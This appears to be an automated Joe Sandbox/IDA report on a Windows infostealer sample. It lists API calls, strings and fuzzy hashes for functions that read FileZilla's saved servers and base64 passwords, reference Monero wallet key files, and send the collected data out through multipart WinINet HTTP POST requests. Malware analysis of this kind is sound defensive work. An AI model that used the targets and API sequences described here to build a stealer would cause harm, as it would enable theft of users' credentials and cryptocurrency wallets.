Part of subcall function 003A75D0: lstrcat.KERNEL32(355A0020, : ), ref: 003A765A
Part of subcall function 003A75D0: lstrcat.KERNEL32(355A0020,00000000), ref: 003A768F
Part of subcall function 003A75D0: lstrcat.KERNEL32(355A0020,003C1804), ref: 003A76A0
Part of subcall function 003A75D0: lstrcat.KERNEL32(355A0020,00000000), ref: 003A76D3
Part of subcall function 003A75D0: lstrcat.KERNEL32(355A0020,003C1808), ref: 003A76ED
Part of subcall function 003A75D0: task.LIBCPMTD ref: 003A76FB

lstrcat.KERNEL32(?,00F3F118), ref: 003A7E0B
lstrcat.KERNEL32(?,00F3D4D0), ref: 003A7E1E
lstrlen.KERNEL32(355A0020), ref: 003A7E2B
lstrlen.KERNEL32(355A0020), ref: 003A7E3B

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: 77e6b043c27367e3087012ce857d682dfc3f808158388e43d6683639df0601c9
Instruction ID: ec7fe0a49ef358a37899e98eccbc39517b2351a4d78de6cda023e19122dba1b5
Opcode Fuzzy Hash: 77e6b043c27367e3087012ce857d682dfc3f808158388e43d6683639df0601c9
Instruction Fuzzy Hash: 20320FB6D00354ABDB16EBB0DCC5DEA737CBB54700F044A88B209AA091EB74E789DF51

Function 003B0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

Part of subcall function 003B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003B8E0B

Part of subcall function 003BA920: lstrcpy.KERNEL32(00000000,?), ref: 003BA972
Part of subcall function 003BA920: lstrcat.KERNEL32(00000000), ref: 003BA982

Part of subcall function 003BA8A0: lstrcpy.KERNEL32(?,003C0E17), ref: 003BA905

Part of subcall function 003BA9B0: lstrlen.KERNEL32(?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003BA9C5
Part of subcall function 003BA9B0: lstrcpy.KERNEL32(00000000), ref: 003BAA04
Part of subcall function 003BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003BAA12

Part of subcall function 003BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003BA7E6

Part of subcall function 003A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003A99EC
Part of subcall function 003A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003A9A11
Part of subcall function 003A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003A9A31
Part of subcall function 003A99C0: ReadFile.KERNEL32(000000FF,?,00000000,003A148F,00000000), ref: 003A9A5A
Part of subcall function 003A99C0: LocalFree.KERNEL32(003A148F), ref: 003A9A90
Part of subcall function 003A99C0: CloseHandle.KERNEL32(000000FF), ref: 003A9A9A

Part of subcall function 003B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003B8E52

GetProcessHeap.KERNEL32(00000000,000F423F,003C0DBA,003C0DB7,003C0DB6,003C0DB3), ref: 003B0362
RtlAllocateHeap.NTDLL(00000000), ref: 003B0369
StrStrA.SHLWAPI(00000000,<Host>), ref: 003B0385
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003C0DB2), ref: 003B0393
StrStrA.SHLWAPI(00000000,<Port>), ref: 003B03CF
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003C0DB2), ref: 003B03DD
StrStrA.SHLWAPI(00000000,<User>), ref: 003B0419
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003C0DB2), ref: 003B0427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 003B0463
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003C0DB2), ref: 003B0475
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003C0DB2), ref: 003B0502
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003C0DB2), ref: 003B051A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003C0DB2), ref: 003B0532
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003C0DB2), ref: 003B054A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 003B0562
lstrcat.KERNEL32(?,profile: null), ref: 003B0571
lstrcat.KERNEL32(?,url: ), ref: 003B0580
lstrcat.KERNEL32(?,00000000), ref: 003B0593
lstrcat.KERNEL32(?,003C1678), ref: 003B05A2
lstrcat.KERNEL32(?,00000000), ref: 003B05B5
lstrcat.KERNEL32(?,003C167C), ref: 003B05C4
lstrcat.KERNEL32(?,login: ), ref: 003B05D3
lstrcat.KERNEL32(?,00000000), ref: 003B05E6
lstrcat.KERNEL32(?,003C1688), ref: 003B05F5
lstrcat.KERNEL32(?,password: ), ref: 003B0604
lstrcat.KERNEL32(?,00000000), ref: 003B0617
lstrcat.KERNEL32(?,003C1698), ref: 003B0626
lstrcat.KERNEL32(?,003C169C), ref: 003B0635
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003C0DB2), ref: 003B068E

Strings

<Pass encoding="base64">, xrefs: 003B045A
profile: null, xrefs: 003B0568
password: , xrefs: 003B05FB
<User>, xrefs: 003B0410
<Port>, xrefs: 003B03C6
<Host>, xrefs: 003B037C
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 003B02A4
login: , xrefs: 003B05CA
url: , xrefs: 003B0577
browser: FileZilla, xrefs: 003B0559

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: 67f91a7a5ca68c0861b679c09b07d75e84d28d8d5396358e0831ec44beaf1cbb
Instruction ID: 0ddaac3fc6f70d2558bfe9c5f88f6a97bfce59f5cb64d9dd5f999d81be05c89b
Opcode Fuzzy Hash: 67f91a7a5ca68c0861b679c09b07d75e84d28d8d5396358e0831ec44beaf1cbb
Instruction Fuzzy Hash: 13D13172900608ABCB0AEBF4DD96EEE7778EF54304F504418F642FA491DF74AA09DB61

Function 003A5100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003BA7E6

Part of subcall function 003A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003A4839
Part of subcall function 003A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003A4849

lstrlen.KERNEL32(00000000), ref: 003A5193

Part of subcall function 003B8EA0: CryptBinaryToStringA.CRYPT32(00000000,003A5184,40000001,00000000,00000000,?,003A5184), ref: 003B8EC0

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003A5207
StrCmpCA.SHLWAPI(?,00F3EFF8), ref: 003A5225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003A5340
HttpOpenRequestA.WININET(00000000,00F3EFB8,?,00F3E630,00000000,00000000,00400100,00000000), ref: 003A53A4

Part of subcall function 003BA9B0: lstrlen.KERNEL32(?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003BA9C5
Part of subcall function 003BA9B0: lstrcpy.KERNEL32(00000000), ref: 003BAA04
Part of subcall function 003BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003BAA12

Part of subcall function 003BA8A0: lstrcpy.KERNEL32(?,003C0E17), ref: 003BA905

Part of subcall function 003BA920: lstrcpy.KERNEL32(00000000,?), ref: 003BA972
Part of subcall function 003BA920: lstrcat.KERNEL32(00000000), ref: 003BA982

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,00F3F028,00000000,?,00F3CD38,00000000,?,003C19DC,00000000,?,003B51CF), ref: 003A5737
lstrlen.KERNEL32(00000000), ref: 003A574B
GetProcessHeap.KERNEL32(00000000,?), ref: 003A575C
RtlAllocateHeap.NTDLL(00000000), ref: 003A5763
lstrlen.KERNEL32(00000000), ref: 003A5778
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003A57A9
lstrlen.KERNEL32(00000000), ref: 003A57C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003A57E1
lstrlen.KERNEL32(00000000,?,?), ref: 003A580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 003A5822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003A584D
InternetCloseHandle.WININET(00000000), ref: 003A58B1
InternetCloseHandle.WININET(00000000), ref: 003A58BE
InternetCloseHandle.WININET(00000000), ref: 003A58C8

Strings

", xrefs: 003A55C4
", xrefs: 003A5482
------, xrefs: 003A53B7
------, xrefs: 003A563B
------, xrefs: 003A54F9
--, xrefs: 003A5280
------, xrefs: 003A5297
", xrefs: 003A5706

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 1224485577-2774362122
Opcode ID: 89dc58cb3e60bbc8b8f9b3f92ccc3a29c5b6e95dcb1e7e30428aa4462d924102
Instruction ID: 46816d4bad428eeca6fa25121325e68fd3ca7e4c41dcbe39a40d91f144b06c36
Opcode Fuzzy Hash: 89dc58cb3e60bbc8b8f9b3f92ccc3a29c5b6e95dcb1e7e30428aa4462d924102
Instruction Fuzzy Hash: 19324371920918BADB16EBA0DC91FEE7778BF54704F404199F206AA892DF303A49DF61

Function 003AA790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003BAA70: StrCmpCA.SHLWAPI(00F38608,003AA7A7,?,003AA7A7,00F38608), ref: 003BAA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003AAAC8
RtlAllocateHeap.NTDLL(00000000), ref: 003AAACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 003AABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003AA8B0

Part of subcall function 003BA820: lstrlen.KERNEL32(003A4F05,?,?,003A4F05,003C0DDE), ref: 003BA82B
Part of subcall function 003BA820: lstrcpy.KERNEL32(003C0DDE,00000000), ref: 003BA885

Part of subcall function 003BA9B0: lstrlen.KERNEL32(?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003BA9C5
Part of subcall function 003BA9B0: lstrcpy.KERNEL32(00000000), ref: 003BAA04
Part of subcall function 003BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003BAA12

Part of subcall function 003BA8A0: lstrcpy.KERNEL32(?,003C0E17), ref: 003BA905

lstrcat.KERNEL32(?,00000000), ref: 003AACEB
lstrcat.KERNEL32(?,003C1320), ref: 003AACFA
lstrcat.KERNEL32(?,00000000), ref: 003AAD0D
lstrcat.KERNEL32(?,003C1324), ref: 003AAD1C
lstrcat.KERNEL32(?,00000000), ref: 003AAD2F
lstrcat.KERNEL32(?,003C1328), ref: 003AAD3E
lstrcat.KERNEL32(?,00000000), ref: 003AAD51
lstrcat.KERNEL32(?,003C132C), ref: 003AAD60
lstrcat.KERNEL32(?,00000000), ref: 003AAD73
lstrcat.KERNEL32(?,003C1330), ref: 003AAD82
lstrcat.KERNEL32(?,00000000), ref: 003AAD95
lstrcat.KERNEL32(?,003C1334), ref: 003AADA4
lstrcat.KERNEL32(?,00000000), ref: 003AADB7
lstrlen.KERNEL32(?), ref: 003AAE0D
lstrlen.KERNEL32(?), ref: 003AAE1C

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

Part of subcall function 003BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003BA7E6

DeleteFileA.KERNEL32(00000000), ref: 003AAE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 003AABD4

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcess
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4157063783-2709115261
Opcode ID: bdb5579a432095501755dfa8c10a90a2b574a3140d51c8bc7c7f3434d2ec5008
Instruction ID: 11ceeb42e4334175175d1c2e29f557356074ca74ae941aeff70c2d1efe490edb
Opcode Fuzzy Hash: bdb5579a432095501755dfa8c10a90a2b574a3140d51c8bc7c7f3434d2ec5008
Instruction Fuzzy Hash: DB125671810908ABDB1AFBA0DD96EEE7778AF14304F504158F643FA891DF346E09DB62

Function 003A5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003BA7E6

Part of subcall function 003A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003A4839
Part of subcall function 003A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003A4849

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003A59F8
StrCmpCA.SHLWAPI(?,00F3EFF8), ref: 003A5A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003A5B93
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00F3F0A8,00000000,?,00F3CD38,00000000,?,003C1A1C), ref: 003A5E71
lstrlen.KERNEL32(00000000), ref: 003A5E82
GetProcessHeap.KERNEL32(00000000,?), ref: 003A5E93
RtlAllocateHeap.NTDLL(00000000), ref: 003A5E9A
lstrlen.KERNEL32(00000000), ref: 003A5EAF
lstrlen.KERNEL32(00000000), ref: 003A5ED8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003A5EF1
lstrlen.KERNEL32(00000000,?,?), ref: 003A5F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 003A5F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 003A5F4C
InternetCloseHandle.WININET(00000000), ref: 003A5FB0
InternetCloseHandle.WININET(00000000), ref: 003A5FBD
HttpOpenRequestA.WININET(00000000,00F3EFB8,?,00F3E630,00000000,00000000,00400100,00000000), ref: 003A5BF8

Part of subcall function 003BA9B0: lstrlen.KERNEL32(?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003BA9C5
Part of subcall function 003BA9B0: lstrcpy.KERNEL32(00000000), ref: 003BAA04
Part of subcall function 003BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003BAA12

Part of subcall function 003BA8A0: lstrcpy.KERNEL32(?,003C0E17), ref: 003BA905

Part of subcall function 003BA920: lstrcpy.KERNEL32(00000000,?), ref: 003BA972
Part of subcall function 003BA920: lstrcat.KERNEL32(00000000), ref: 003BA982

InternetCloseHandle.WININET(00000000), ref: 003A5FC7

Strings

", xrefs: 003A5E16
", xrefs: 003A5CD5
------, xrefs: 003A5A96
------, xrefs: 003A5D4C
------, xrefs: 003A5C0B

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
